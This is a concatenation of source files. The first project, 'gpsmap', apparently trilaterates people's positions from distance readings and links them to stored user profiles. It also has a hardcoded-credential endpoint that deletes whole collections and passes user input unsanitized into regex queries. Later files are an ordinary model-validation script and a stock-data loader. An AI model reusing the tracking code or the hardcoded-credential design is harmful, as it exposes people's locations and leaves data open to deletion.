point = {"type": "Point", "coordinates": [lng, lat]}
f = {"loc": {"$near": {"$geometry": point}}}
c = {"_id": 0, "loc":1, "id": 1, "time": 1, "level": 1, "distance": 1}
db = self.connect.get_database(global_db_name)
coll = db.get_collection(global_db_calc_collection)
it = coll.find(f, c) ## sort by $near
ret = {}
for one in it:
if len(ret) >= count:
break
try:
if one['id'] not in ret:
ret[one['id']] = one
continue
if one['level'] > 0 and one['level'] < ret[one['id']]['level']:
ret[one['id']] = one
continue
if one['time'] > ret[one['id']]['time']:
ret[one['id']] = one
continue
except Exception as e:
continue
if not ret:
return None
c = {"_id": 0, "name": 1, "time": 1, "id": 1, "ocount": 1, "pcount": 1,
"img":1, "sign": 1, global_key_gender: 1}
coll = db.get_collection(global_db_user_collection)
for key in ret:
tmp = ret[key]
ret[key] = {global_key_uid: key,
"time": tmp["time"],
"latitude": tmp["loc"]["coordinates"][1],
"longitude": tmp["loc"]["coordinates"][0],
"distance": tmp["distance"]
}
f = {"id": key}
try:
it = coll.find(f, c).sort("time", pymongo.DESCENDING).limit(1)
for one in it:
ret[key].update(one)
except Exception as e:
pass
if ret:
tmp = []
for key in ret:
tmp.append(ret[key])
ret = tmp
return ret
## update by user
'''
UI action
'''
def create_filter_for_user(self, obj):
regex_list = ["name", "sign", "province", "city"]
bool_list = {"country": "CN"}
select_list = {"gender": ("female", "male")}
match_list = ["id", "device"]
gte_list = ["ocount", "pcount"]
time_list = ["start", "end"]
for key in ["ocount", "pcount"]:
if key in obj and obj[key] is not None:
obj[key] = int(obj[key])
f = {}
for key in obj:
if not obj[key]:
continue
if key in regex_list:
f[key] = {'$regex': obj[key], '$options': "i"}
continue
if key in bool_list:
if obj[key] == bool_list[key]:
f[key] = obj[key]
else:
f[key] = {"$not": {"$eq": bool_list[key]}}
continue
if key in select_list:
try:
s = str(obj[key]).lower()
if s in select_list[key]:
f[key] = s
except Exception as e:
pass
continue
if key in match_list:
f[key] = obj[key]
continue
if key in gte_list:
f[key] = {"$gte": obj[key]}
continue
if key in time_list:
obj[key] = string_standard(obj[key])
if "time" not in f:
f["time"] = {}
if key == "start":
f["time"]["$gte"] = obj[key]
elif key == "end":
f["time"]["$lte"] = obj[key]
continue
return f
def create_row_for_user(self):
return {"_id": 0,
"name": 1, "time": 1, "id": 1,
"device": 1, "ocount": 1, "pcount": 1,
"country":1, "province":1, "city":1,
"img":1, "sign": 1, global_key_gender: 1}
def show_search(self, obj):
f = self.create_filter_for_user(obj)
c = self.create_row_for_user()
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_user_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
ret.append(d)
return ret
except Exception as e:
error_print(e)
return None
def show_name(self, name):
f = self.create_filter_for_user({"name": name})
c = self.create_row_for_user()
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_user_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
ret.append(d)
return ret
except Exception as e:
error_print(e)
return None
def origin_points(self, id, start, end):
f = {"id": id}
if start:
f["time"]={}
f["time"]["$gte"]=start
if end:
if "time" not in f:
f["time"]={}
f["time"]["$lte"]=end
c = {"_id":0, "loc.coordinates": 1, "time": 1, "distance": 1, "sendtime": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_origin_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
tmp = {}
if "loc" in d and "coordinates" in d["loc"] and len(d["loc"]["coordinates"]) > 1:
tmp["latitude"] = d["loc"]["coordinates"][1]
tmp["longitude"] = d["loc"]["coordinates"][0]
else:
continue
if "time" in d:
tmp["time"] = d["time"]
else:
continue
if "sendtime" in d:
tmp["sendtime"] = d["sendtime"]
if "distance" in d:
tmp["distance"] = d["distance"]
ret.append(tmp)
return ret
except Exception as e:
error_print(e)
return None
def origin_points_uni(self, id, start, end):
f = {"id": id}
if start:
f["time"]={}
f["time"]["$gte"]=start
if end:
if "time" not in f:
f["time"]={}
f["time"]["$lte"]=end
c = {"_id":0, "loc.coordinates": 1, "time": 1, "distance": 1, "sendtime": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_origin_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
uniset = {}
min_time = None
for d in r:
tmp = {}
if "loc" in d and "coordinates" in d["loc"] and len(d["loc"]["coordinates"]) > 1:
tmp["latitude"] = d["loc"]["coordinates"][1]
tmp["longitude"] = d["loc"]["coordinates"][0]
else:
continue
if "time" in d:
tmp["time"] = d["time"]
else:
continue
if "sendtime" in d:
tmp["sendtime"] = d["sendtime"]
if "distance" in d:
tmp["distance"] = d["distance"]
if not min_time or min_time["time"] > tmp["time"]:
min_time = tmp;
if (tmp["latitude"], tmp["longitude"]) not in uniset or uniset[(tmp["latitude"], tmp["longitude"])]["time"] < tmp["time"]:
uniset[(tmp["latitude"], tmp["longitude"])] = tmp;
ret = []
if min_time:
if (min_time["latitude"], min_time["longitude"]) in uniset and uniset[(min_time["latitude"], min_time["longitude"])]["time"] == min_time["time"]:
del uniset[(min_time["latitude"], min_time["longitude"])]
ret.append(min_time)
for one in uniset.itervalues():
ret.append(one)
return ret
except Exception as e:
error_print(e)
return None
'''
Device Action
'''
def set_device(self, task, device, la, lo):
f = {"device": device, "task": task}
data ={"$set": {"device": device,
"loc": {"type": "Point", "coordinates" : [lo, la]},
"time": time_now()} }
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
r = collection.update_one(f, data, True)
return r.modified_count or r.upserted_id
except Exception as e:
error_print(e)
return None
def device_obj(self, task, data):
try:
obj = json.loads(data)
tmp = []
task_len = len(task)
max_name = ''
name = "!"
for one in obj:
if "latitude" not in one or "longitude" not in one:
continue
name = "!"
if "device" in one and one["device"][0:task_len] == task:
name = str(one["device"])
if max_name < name:
max_name = name
tmp.append((name, one["latitude"], one["longitude"]))
tmp = sorted(tmp, key=lambda x: x[0])
number = 0
if max_name:
try:
number = int(max_name[task_len:])
except Exception as e:
error_print(e)
pass
if number < 1:
number = 1
else:
number += 1
ret = {}
for one in tmp:
name = one[0]
if name in ret or name == "!":
name = "{0}{1:04d}".format(task, number)
number += 1
ret[name] = (one[1], one[2])
return ret
except Exception as e:
error_print(e)
pass
return None
def setall_device(self, task, data):
# find all task point
# loop data
# bulk insert update delete
#
#
obj = self.device_obj(task, data)
if not obj:
if data is None:
return None
### remove all
return self.delete_all_device(task)
f = {"task": task}
c = {"_id": 1, "device": 1, "loc": 1, "time": 1}
action = []
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
bulk = collection.initialize_unordered_bulk_op()
it = collection.find(f, c).sort("time", pymongo.DESCENDING)
count = 0
for one in it:
if "device" not in one or one["device"] not in obj:
bulk.find({"_id": one["_id"]}).remove()
count += 1
continue
tmp = obj[one["device"]]
data = {
"$set": {
"device": one["device"],
"loc":{"type": "Point", "coordinates": [tmp[1], tmp[0]]},
"time": time_now(),
"task": task
}
}
bulk.find({"_id": one["_id"]}).upsert().update(data)
count += 1
del obj[one["device"]]
for key in obj:
data = {
"device": key,
"loc": {"type": "Point", "coordinates": [obj[key][1], obj[key][0]]},
"time": time_now(),
"task": task
}
bulk.insert(data)
count += 1
result = bulk.execute()
count = result['nInserted'] + result['nUpserted'] + result['nModified'] + result['nRemoved']
if count:
return self.get_device_all(task)
return None
def get_device(self, task, device):
f = {"device": device, "task": task}
c = {"_id": 0, "device": 1, "loc": 1, "time": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
ret.append({ "device": d["device"],
"time": d["time"],
"latitude": d["loc"]["coordinates"][1],
"longitude": d["loc"]["coordinates"][0],
})
return ret
except Exception as e:
error_print(e)
return None
def delete_device(self, task, device):
f = {"device": device, "task": task}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
return collection.delete_one(f).deleted_count > 0
except Exception as e:
error_print(e)
return None
def delete_all_device(self, task):
f = {"task": task}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
return collection.delete_many(f).deleted_count
except Exception as e:
error_print(e)
return None
def get_device_all(self, task):
f = {"task": task}
c = {"_id": 0, "device": 1, "loc": 1, "time": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
r = collection.find(f, c).sort([("device", pymongo.ASCENDING), ("time", pymongo.DESCENDING)])
t = {}
for d in r:
if d['device'] not in t:
t[d['device']] = {}
elif t[d['device']]['time'] > d["time"]:
continue
t[d['device']]['time'] = d["time"]
t[d['device']]['latitude'] = d["loc"]["coordinates"][1]
t[d['device']]['longitude'] = d["loc"]["coordinates"][0]
ret = []
for d in t:
ret.append( {
'device': d,
'time': t[d]['time'],
'latitude': t[d]['latitude'],
'longitude': t[d]['longitude'],
} )
return ret
except Exception as e:
error_print(e)
return None
def delete_information(self, t):
if not t:
return None
try:
db = self.connect.get_database(global_db_name)
count = 0
collection = None
if t == "users":
collection = db.get_collection(global_db_user_collection)
elif t == "device":
collection = db.get_collection(global_db_device_collection)
elif t == "points":
collection = db.get_collection(global_db_origin_collection)
elif t == "result":
collection = db.get_collection(global_db_calc_collection)
if not collection:
return count
result = collection.delete_many({})
if result:
count = result.deleted_count
return count
except Exception as e:
error_print(e)
return None
global_unique_opt_obj = None
global_unique_opt_obj_mx = threading.Lock()
def get_unique_opt():
global global_unique_opt_obj
global global_unique_opt_obj_mx
global_unique_opt_obj_mx.acquire()
if not global_unique_opt_obj:
try:
global_unique_opt_obj = opt()
except Exception as e:
global_unique_opt_obj = None
error_print(e)
pass
global_unique_opt_obj_mx.release()
return global_unique_opt_obj
def unique_push_data(data):
obj = get_unique_opt()
if not obj:
return None
return obj.producer(data)
def unique_check_and_calc(id, start, end, tunit):
obj = get_unique_opt()
if not obj:
return None
start = string_standard(start)
end = string_standard(end)
ret = obj.check_and_calc(id, start, end, tunit)
return ret
def unique_origin_points(id, start, end):
obj = get_unique_opt()
if not obj:
return None
start = string_standard(start)
end = string_standard(end)
ret = obj.origin_points(id, start, end)
return ret
def unique_show_name(name):
obj = get_unique_opt()
if not obj:
return None
ret = obj.show_search({"name":name})
return ret
def unique_show_search(args):
obj = get_unique_opt()
if not obj:
return None
ret = obj.show_search(args)
return ret
def unique_set_device(task, device, la, lo):
obj = get_unique_opt()
if not obj:
return None
ret = obj.set_device(task, device, la, lo)
return ret
def unique_setall_device(task, data):
obj = get_unique_opt()
if not obj:
return None
ret = obj.setall_device(task, data)
return ret
def unique_get_device(task, device):
obj = get_unique_opt()
if not obj:
return None
ret = obj.get_device(task, device)
return ret
def unique_get_device_all(task):
obj = get_unique_opt()
if not obj:
return None
ret = obj.get_device_all(task)
return ret
def unique_delete_device(task, device):
obj = get_unique_opt()
if not obj:
return None
ret = obj.delete_device(task, device)
return ret
def unique_delete_information(t):
obj = get_unique_opt()
if not obj:
return None
ret = obj.delete_information(t)
return ret
def unique_NearPoint(lat, lng, count):
obj = get_unique_opt()
if not obj:
return None
ret = obj.NearPoint(lat, lng, count)
return ret
```
#### File: gpsmap/gpsmap/calc_postion.py
```python
import utm
import math
baidu_ak = '<KEY>'
global_EP = 50
global_status = ['Err', 'far','outside','inside','cross','include']
class utm_point():
def __init__(self, x = 0.0, y = 0.0, zone = 0, mark = '', r = 0.0):
self.x = x
self.y = y
self.zone = zone
self.mark = mark
self.r = r
def __str__(self):
return "(x:{0}, y:{1}, zone:{2}, mark:{3}, distance:{4})".format(self.x, self.y, self.zone, self.mark, self.r)
def is_same_zone(self, dst):
return self.zone == dst.zone and self.mark == dst.mark
def sqr(a):
return a * a
def distance(a, b):
width = a.x - b.x if a.x > b.x else b.x -a.x
length = a.y - b.y if a.y > b.y else b.y -a.y
return math.sqrt(sqr(width) + sqr(length))
def calc_cross_point(A, B, EP = global_EP):
d = distance(A, B);
if A.r + B.r + EP < d:
return 1, None, None
elif d < EP:
return 5, None, None
ia = utm_point(zone=A.zone, mark = A.mark, r=EP)
ib = utm_point(zone=A.zone, mark = A.mark, r=EP)
sqr_k = sqr(A.r)
a = B.x - A.x
sqr_a = sqr(a)
b = B.y - A.y
sqr_b = sqr(b)
d = sqr(B.r) - sqr_k - sqr_a - sqr_b
aa = 4 * sqr_a + 4 * sqr_b;
bb = 4 * b * d;
cc = sqr(d) - 4 * sqr_a * sqr_k;
drt = sqr(bb) - 4 * aa * cc
if drt < 0:
return 5, None, None
drt = math.sqrt(drt);
ia.y = (-bb + drt) / 2 / aa
ib.y = (-bb - drt) / 2 / aa
if math.fabs(a) < EP:
ia.x = math.sqrt(sqr_k - sqr(ia.y))
ib.x = -ia.x
else:
ia.x = (2 * b * ia.y + d) / -2 / a
ib.x = (2 * b * ib.y + d) / -2 / a
ia.x += A.x;
ia.y += A.y;
ib.x += A.x;
ib.y += A.y;
if math.fabs(ia.y - ib.y) < EP:
if abs(A.r + B.r - d) < EP:
return 2, ia, ib
if abs(d + min(A.r, B.r) - max(A.r, B.r)) < EP:
return 3, ia, ib
return 4, ia, ib
def calc_distance_utm(u1,u2,u3, EP):
s, p1, p2 = calc_cross_point(u1, u2)
if not p1 or not p2:
return None
p1.r = EP
p2.r = EP
pr = None
if s == 2 or s == 3:
d1 = distance(p1, u3)
if math.fabs(d1 -u3.r) < EP:
pr = p1
elif s == 4:
d1 = distance(p1, u3)
d2 = distance(p2, u3)
b1 = u3.r - EP < d1 and d1 < u3.r + EP
b2 = u3.r - EP < d2 and d2 < u3.r + EP
if not b1 and not b2:
pr = None
elif not b1 and b2:
pr = p2
elif b1 and not b2:
pr = p1
else : # b1 and b2
d1 = math.fabs(d1 - u3.r)
d2 = math.fabs(d2 - u3.r)
pr = p1 if d1 < d2 else p2
if pr:
return pr
return None
def calc( latitude1, longitude1, r1,
latitude2, longitude2, r2,
latitude3, longitude3, r3, EP = global_EP):
try:
u1 = utm_point( *utm.from_latlon(latitude1,longitude1), r=r1)
u2 = utm_point( *utm.from_latlon(latitude2,longitude2), r=r2)
u3 = utm_point( *utm.from_latlon(latitude3,longitude3), r=r3)
except Exception as e:
return None
pr = calc_distance_utm(u1,u2,u3, EP)
if pr:
latitude, longitude = utm.to_latlon(pr.x, pr.y, pr.zone, pr.mark)
return latitude, longitude, pr.r
return None
def calc_list_core( l_points, EP, func_fretch ):
npos1 = 0
npos2 = 0
npos3 = 0
list_count = len(l_points)
ret_list = {}
ret_list[3]=[]
ret_list[5]=[]
while npos1 < list_count - 2:
try:
la1, lo1, dis1 = func_fretch(l_points[npos1])
npos1 = npos1 + 1
if not la1 or not lo1 or not dis1:
continue
u1 = utm_point(*utm.from_latlon(la1,lo1), r=int(dis1))
except Exception as e:
continue
npos2 = npos1
while npos2 < list_count - 1:
try:
la2, lo2, dis2 = func_fretch(l_points[npos2])
npos2 = npos2 + 1
if not la2 or not lo2 or not dis2:
continue
u2 = utm_point( *utm.from_latlon(la2,lo2), r=int(dis2))
except Exception as e:
continue
s, p1, p2 = calc_cross_point(u1, u2)
if not p1 or not p2:
continue
npos3 = npos2
while npos3 < list_count:
try:
la3, lo3, dis3 = func_fretch(l_points[npos3])
npos3 = npos3 + 1
if not la3 or not lo3 or not dis3:
continue
u3 = utm_point( *utm.from_latlon(la3,lo3), r=int(dis3))
except Exception as e:
continue
ret, level = calc_list_core_cross_point(s, p1, p2, u3, EP)
if ret:
return ret, level
return None, 0
def calc_list_core_cross_point(s, p1, p2, u3, EP):
if s == 2 or s == 3:
d1 = distance(p1, u3)
if math.fabs(d1 - u3.r) < EP:
return p1, 5
elif s == 4:
d1 = distance(p1, u3)
d2 = distance(p2, u3)
b1 = u3.r - EP < d1 and d1 < u3.r + EP
b2 = u3.r - EP < d2 and d2 < u3.r + EP
if not b1 and not b2:
return None, 0
elif not b1 and b2:
return p2, 1
elif b1 and not b2:
return p1, 1
else:
d1 = math.fabs(d1 - u3.r)
d2 = math.fabs(d2 - u3.r)
return p1 if d1 < d2 else p2, 3
return None
def calc_list_core_cover_zone(s, p1, p2, u3):
if s in [2,3]:
d1 = distance(p1,u3)
if d1 < u3.r:
p1.r = u3.r - d1
if p1.r > d1:
p1.r = d1
return p1, 5
elif s == 4:
d1 = distance(p1, u3)
d2 = distance(p2, u3)
b1 = u3.r < d1 and d1 < u3.r
b2 = u3.r < d2 and d2 < u3.r
if True not in [b1, b2]:
return None, None
elif not b1 and b2:
return calc_point_then_middle(u3, p2, d2), 1
elif b1 and not b2:
return calc_point_then_middle(u3, p1, d1), 1
else:
return calc_middle_then_point(u3, p1, d1, p2, d2), 3
return None
def calc_point_then_middle(u3, p, d):
ret = utm_point(zone=p.zone, mark = p.mark, r=(u3.r - d)/2 )
rate = d + ret.r / d
ret.x = (p.x - u3.x) * rate
ret.y = (p.y - u3.y) * rate
return ret
def calc_middle_then_point(u3, p1,d1, p2,d2):
ret = calc_middle_point(p1, p2)
d1 = distance(u3, ret)
d2 = u3.r - d1
if d2 > d1:
d2 = d1
if ret.r > d2:
ret.r = d2
return ret
def calc_middle_point(p1, p2):
d1 = distance(p1, p2)
ret = utm_point(zone=p.zone, mark = p.mark, r=d1/2 )
ret.x = (p1.x + p2.x)/2
ret.y = (p1.y + p2.y)/2
return ret
def calc_list_precheck(l_points, func_fretch):
ret = {}
if len(l_points) < 3:
return False
for o in l_points:
la, lo, _ = func_fretch(o)
if la and lo:
ret[(la,lo)] = True
if len(ret) < 3:
return False
return True
def calc_list( l_points, EP, func_fretch ):
if not calc_list_precheck(l_points, func_fretch):
return None
pr, level = calc_list_core(l_points, EP, func_fretch)
if pr:
latitude, longitude = utm.to_latlon(pr.x, pr.y, pr.zone, pr.mark)
return latitude, longitude, pr.r, level
return None
```
#### File: gpsmap/gpsmap/work_app.py
```python
import calc_postion
import datetime
import backend
import json
import io
from baselib import error_print
from flask import Flask, render_template, make_response
from flask import request
from flask_restful import reqparse, abort, Api, Resource
app = Flask(__name__)
api_loader = Api(app)
parser = reqparse.RequestParser()
for pa in ['la1', 'lo1', 'd1',
'la2', 'lo2', 'd2',
'la3', 'lo3', 'd3', 'EP',
'data', 'name', 'id', 'task',
'start', 'end', 'tunit', 'count',
'device', 'action', 'latitude', 'longitude',
'sign', 'gender', 'country', 'province', 'city',
'ocount', 'pcount',
]:
parser.add_argument(pa)
def html_template(page):
args = parser.parse_args()
args['name_js'] = page + '.js'
args['name_css'] = page + '.css'
return render_template('points_template.html', **args)
def html(page):
args = parser.parse_args()
args['name_js'] = page + '.js'
args['name_css'] = page + '.css'
if not args["id"]:
args["id"] = ''
return render_template('template_html.html', **args)
## For debug show demo page
@app.route('/demo', methods=['GET'])
def demo():
return html("demo")
## Show calc points page
@app.route('/cpoints', methods=['GET'])
def cpoints():
return html_template("cpoints")
## Show calc points page
@app.route('/opoints', methods=['GET'])
def opoints():
return html_template("opoints")
## Show near points page
@app.route('/npoints', methods=['GET'])
def npoints():
return html_template("npoints")
## Show device points page
@app.route('/dpoints', methods=['GET'])
def dpoints():
return html_template("dpoints")
@app.route('/name', methods=['GET'])
def js_page():
return html("name")
@app.route('/calc', methods=['GET'])
def calc():
args = parser.parse_args()
try:
la1 = float(args['la1'])
lo1 = float(args['lo1'])
d1 = float(args['d1'])
la2 = float(args['la2'])
lo2 = float(args['lo2'])
d2 = float(args['d2'])
la3 = float(args['la3'])
lo3 = float(args['lo3'])
d3 = float(args['d3'])
EP = 100
if args['EP']:
EP = float(args['EP'])
if not EP:
EP = 100
r = calc_postion.calc(la1, lo1, d1, la2, lo2, d2, la3, lo3, d3, EP)
if not r:
return '{"success": 0}'
# calc
return '{{"success": 1, "la":{0}, "lo":{1}, "dis":{2} }}'.format( r[0], r[1], r[2] )
except Exception as e:
return '{"success": 0}'
@app.route("/upload", methods=['GET', 'POST'])
def upload():
args = parser.parse_args()
try:
if 'data' not in args or not args['data']:
return '{"success": 0}'
if backend.unique_push_data(args['data']):
return '{"success": 1}'
except Exception as e:
print("{0} {1}".format(__name__, e))
pass
return '{"success": 0}'
@app.route("/show", methods=['GET', 'POST'])
def show():
args = parser.parse_args()
try:
ret = backend.unique_show_search(args)
if ret:
data = { "success": 1,
"data": ret}
ret = json.dumps(data, indent= None)
return ret
except Exception as e:
print("{0} {1}".format(__name__, e))
return '{"success": 0}'
@app.route("/result", methods=['GET', 'POST'])
def result():
args = parser.parse_args()
if 'id' not in args or not args['id']:
return '{"success": 0}'
try:
ret = backend.unique_check_and_calc(args['id'], args['start'], args['end'], args['tunit'])
if ret:
data = {"success": 1,
"data": ret}
ret = json.dumps(data, indent=None)
return ret
except Exception as e:
print("{0} {1}".format(__name__, e))
pass
return '{"success": 0}'
@app.route("/near", methods=['GET', 'POST'])
def near():
args = parser.parse_args()
try:
latitude = float(args['latitude'])
longitude = float(args['longitude'])
count = int(args['count'])
if not count:
count = 20
if latitude and longitude:
ret = backend.unique_NearPoint(latitude,longitude, count)
if ret:
data = {"success": 1,
"data": ret}
ret = json.dumps(data, indent=None)
return ret
except Exception as e:
print("{0} {1}".format(__name__, e))
return '{"success": 0}'
@app.route("/origin", methods=['GET', 'POST'])
def origin():
args = parser.parse_args()
if 'id' not in args or not args['id']:
return '{"success": 0}'
try:
ret = backend.unique_origin_points(args['id'], args['start'], args['end'])
if ret:
data = {"success": 1,
"data": ret}
ret = json.dumps(data, indent=None)
return ret
except Exception as e:
print("{0} {1}".format(__name__, e))
return '{"success": 0}'
@app.route("/device", methods=['GET', 'POST'])
def device():
args = parser.parse_args()
a = 'get'
task = "node"
if args['action']:
a = args['action'].lower()
if args['task'] and len(args['task']):
task = args['task']
if a == 'setall':
ret = backend.unique_setall_device(task, args['data'])
if ret:
data = {"success": 1,
"data": ret}
ret = json.dumps(data, indent=None)
return ret
return '{"success": 0}'
if a == 'getall':
ret = backend.unique_get_device_all(task)
if ret:
data = {"success": 1,
"data": ret}
ret = json.dumps(data, indent=None)
return ret
if not args['device']:
return '{"success": 0}'
if a == 'set' and args['latitude'] and args['longitude']:
if backend.unique_set_device(task, args['device'], float(args['latitude']), float(args['longitude'])):
return '{"success": 1}'
elif a == 'delete':
if backend.unique_delete_device(task, args['device']):
return '{"success": 1}'
else:
ret = backend.unique_get_device(task, args['device'])
if ret:
data = {"success": 1,
"data": ret}
ret = json.dumps(data, indent=None)
return ret
return '{"success": 0}'
@app.route("/becareful", methods=['GET', 'POST'])
def becareful():
args = parser.parse_args()
action = args["action"]
name = args["name"]
i = args["id"]
if name != "IknowPasswoRd" or i != "RisIngRiRi":
return '{"success": 0}'
if action not in ["users", "device", "points"]:
return '{"success": 0}'
ret = backend.unique_delete_information(action)
if ret:
return '{"success": 1}'
return '{"success": 0}'
#main enter
global_main_enter = {}
for key in ["cpoints", "opoints", "npoints", "dpoints"]:
global_main_enter[key] = html_template
for key in ["demo", "name"]:
global_main_enter[key] = html
global_main_enter["calc"] = calc
## Show Main page
@app.route('/', methods=['GET'])
def index():
return html_template("index")
@app.route("/<action>", methods=['GET', 'POST'])
def enter(action):
try:
action = action.lower()
except Exception as e:
error_print(e)
abort(404)
return
if action not in global_main_enter:
abort(404)
return
function = global_main_enter[action]
return function(action)
``` |
{
"source": "Johnzhjw/CIT2FR-FL-NAS",
"score": 2
} |
#### File: Johnzhjw/CIT2FR-FL-NAS/validation.py
```python
import time
import json
import torch
import logging
import argparse
from collections import OrderedDict
from timm.utils import accuracy, AverageMeter, setup_default_logging
from codebase.run_manager import get_run_config
from codebase.networks.nsganetv2 import NSGANetV2
def validate(model, loader, criterion, log_freq=50):
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
model.eval()
end = time.time()
with torch.no_grad():
for i, (input, target) in enumerate(loader):
target = target.cuda()
input = input.cuda()
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(acc1.item(), input.size(0))
top5.update(acc5.item(), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % log_freq == 0:
logging.info(
'Test: [{0:>4d}/{1}] '
'Time: {batch_time.val:.3f}s ({batch_time.avg:.3f}s, {rate_avg:>7.2f}/s) '
'Loss: {loss.val:>7.4f} ({loss.avg:>6.4f}) '
'Acc@1: {top1.val:>7.3f} ({top1.avg:>7.3f}) '
'Acc@5: {top5.val:>7.3f} ({top5.avg:>7.3f})'.format(
i, len(loader), batch_time=batch_time,
rate_avg=input.size(0) / batch_time.avg,
loss=losses, top1=top1, top5=top5))
results = OrderedDict(
top1=round(top1.avg, 4), top1_err=round(100 - top1.avg, 4),
top5=round(top5.avg, 4), top5_err=round(100 - top5.avg, 4))
logging.info(' * Acc@1 {:.1f} ({:.3f}) Acc@5 {:.1f} ({:.3f})'.format(
results['top1'], results['top1_err'], results['top5'], results['top5_err']))
def main(args):
setup_default_logging()
logging.info('Running validation on {}'.format(args.dataset))
net_config = json.load(open(args.model))
if 'img_size' in net_config:
img_size = net_config['img_size']
else:
img_size = args.img_size
run_config = get_run_config(
dataset=args.dataset, data_path=args.data, image_size=img_size, n_epochs=0,
train_batch_size=args.batch_size, test_batch_size=args.batch_size,
n_worker=args.workers, valid_size=None)
model = NSGANetV2.build_from_config(net_config)
param_count = sum([m.numel() for m in model.parameters()])
logging.info('Model created, param count: %d' % param_count)
model = model.cuda()
criterion = torch.nn.CrossEntropyLoss().cuda()
validate(model, run_config.test_loader, criterion)
return
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# data related settings
parser.add_argument('--data', type=str, default='/mnt/datastore/ILSVRC2012',
help='location of the data corpus')
parser.add_argument('--dataset', type=str, default='imagenet',
help='name of the dataset (imagenet, cifar10, cifar100, ...)')
parser.add_argument('-j', '--workers', type=int, default=6,
help='number of workers for data loading')
parser.add_argument('-b', '--batch-size', type=int, default=256,
help='test batch size for inference')
parser.add_argument('--img-size', type=int, default=224,
help='input resolution (192 -> 256)')
# model related settings
parser.add_argument('--model', '-m', metavar='MODEL', default='', type=str,
help='model configuration file')
parser.add_argument('--pretrained', type=str, default='',
help='path to pretrained weights')
cfgs = parser.parse_args()
main(cfgs)
``` |
{
"source": "Johnzhjw/evoIT2FRNN-GEP",
"score": 3
} |
#### File: PythonScripts/Python/main.py
```python
import time
import argparse
import torch.nn as nn
import torch
import torch.optim as optim
from torch.utils.data import DataLoader, Dataset
import numpy as np
from torch.autograd import Variable
import os
import pandas as pd
from torchvision import transforms
import json
import matplotlib.pyplot as plt
import torch.backends.cudnn as cudnn
from tqdm import tqdm
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
class AverageMeter(object):
"""
Computes and stores the average and current value
Copied from: https://github.com/pytorch/examples/blob/master/imagenet/main.py
"""
def __init__(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
# ้ๅDataset
class Mydataset(Dataset):
def __init__(self, xx, yy, transform=None):
self.x = xx
self.y = yy
self.tranform = transform
def __getitem__(self, index):
x1 = self.x[index]
y1 = self.y[index]
if self.tranform != None:
return self.tranform(x1.reshape(len(x1), -1)), y1
return x1.reshape(len(x1), -1), y1
def __len__(self):
return len(self.x)
def get_dataset(file_name='../dataset/Stk.0941.HK.all.csv', train_ratio=2 / 3, col_name_tar="Close", flag_multi=False,
flag_fuse=False, tag_norm='min-max', trn_batch_size=12, vld_batch_size=12, shuffle=True):
df = pd.read_csv(file_name)
# df = df.sort_index(ascending=True)
print(df.head(5))
train_len = int(len(df) * train_ratio)
# ๆๅopen,close,high,low,vol ไฝไธบfeature,ๅนถๅๆ ๅๅ
# df = df[["Open", "Close", "High", "Low", "Volume", "Adjusted"]]
df = df[[col for i, col in enumerate(df.columns) if i]]
tar_min = df[col_name_tar][:train_len].min()
tar_max = df[col_name_tar][:train_len].max()
tar_mean = df[col_name_tar][:train_len].mean()
tar_std = df[col_name_tar][:train_len].std()
if tag_norm == 'min-max':
df = df.apply(lambda x: (x - min(x[:train_len])) / (max(x[:train_len]) - min(x[:train_len])))
elif tag_norm == 'Z-score':
df = df.apply(lambda x: (x - x[:train_len].mean()) / x[:train_len].std())
elif tag_norm == 'none':
df = df.apply(lambda x: x)
else:
print('Invalid norm type.')
df = df.fillna(0)
df.replace([np.inf, -np.inf], 0, inplace=True)
if flag_fuse:
train_inds = [i for i, col in enumerate(df.columns) if col != col_name_tar]
else:
train_inds = [i for i, col in enumerate(df.columns)]
if flag_multi:
n_ft = len(train_inds)
else:
n_ft = 1
train_inds = [i for i, col in enumerate(df.columns) if col == col_name_tar]
test_inds = [i for i, col in enumerate(df.columns) if col == col_name_tar]
total_len = df.shape[0]
sequence = 3
X = []
Y = []
for i in range(df.shape[0] - sequence):
X.append(np.array(df.iloc[i:(i + sequence), train_inds], dtype=np.float32).reshape(sequence, -1))
Y.append(np.array(df.iloc[(i + sequence), test_inds], dtype=np.float32).reshape(-1, ))
print(X[0])
print(Y[0])
# # ๆๅปบbatch
trainx, trainy = X[:(train_len - sequence)], Y[:(train_len - sequence)]
testx, testy = X[(train_len - sequence):], Y[(train_len - sequence):]
train_loader = DataLoader(dataset=Mydataset(trainx, trainy, transform=transforms.ToTensor()),
batch_size=trn_batch_size, shuffle=shuffle)
test_loader = DataLoader(dataset=Mydataset(testx, testy), batch_size=vld_batch_size, shuffle=shuffle)
return {'tar_min': tar_min, 'tar_max': tar_max, 'tar_mean': tar_mean, 'tar_std': tar_std, 'n_ft': n_ft,
